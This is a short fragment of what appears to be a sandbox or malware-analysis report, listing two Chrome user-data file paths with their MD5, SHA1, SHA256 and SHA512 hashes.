SHA512 15d80b800f914e54ebcf54f204ea2fe605f632cdab61abbe02b6ee9f18bb2a9b0462288a5cc5901d0c3bd58446c8e9cbda944ce12900a811948980eb064f7ef6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 986d68f83c8fef14001018b6425e47a4
SHA1 8003a40bafcf012a7c190b6dfa39e94d26e31386
SHA256 d183fd30aa8dbeec3b64309fddd3ea7e9c9a0f549d08cb85597ba7a36cf16bc2
SHA512 2b8e403f281599520314913922512717d35d144a1dc44b4beabf462d847ece7d491c28cbb8908148b295bc8115f6ca3288f1be4cc1fa2db4e34c25cc9237c6e7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d9d56a642aeadef9dbaeb7f0930c6770
SHA1 fb66e9b3dc083efed8211d9be732748c23502936
SHA256 32c3060e414ecfe1b65846a52505ae6ed0dbf57a82679f608ddfe454294aab1d
SHA512 f02fac0a848feb10384d8d399125e1d56263cea1b0ac267c73c02dbbb8d0976b66a02e28c8301a39ed3dee1ba76c40268888b0b02a4aeb6fe13b5a9257f20e70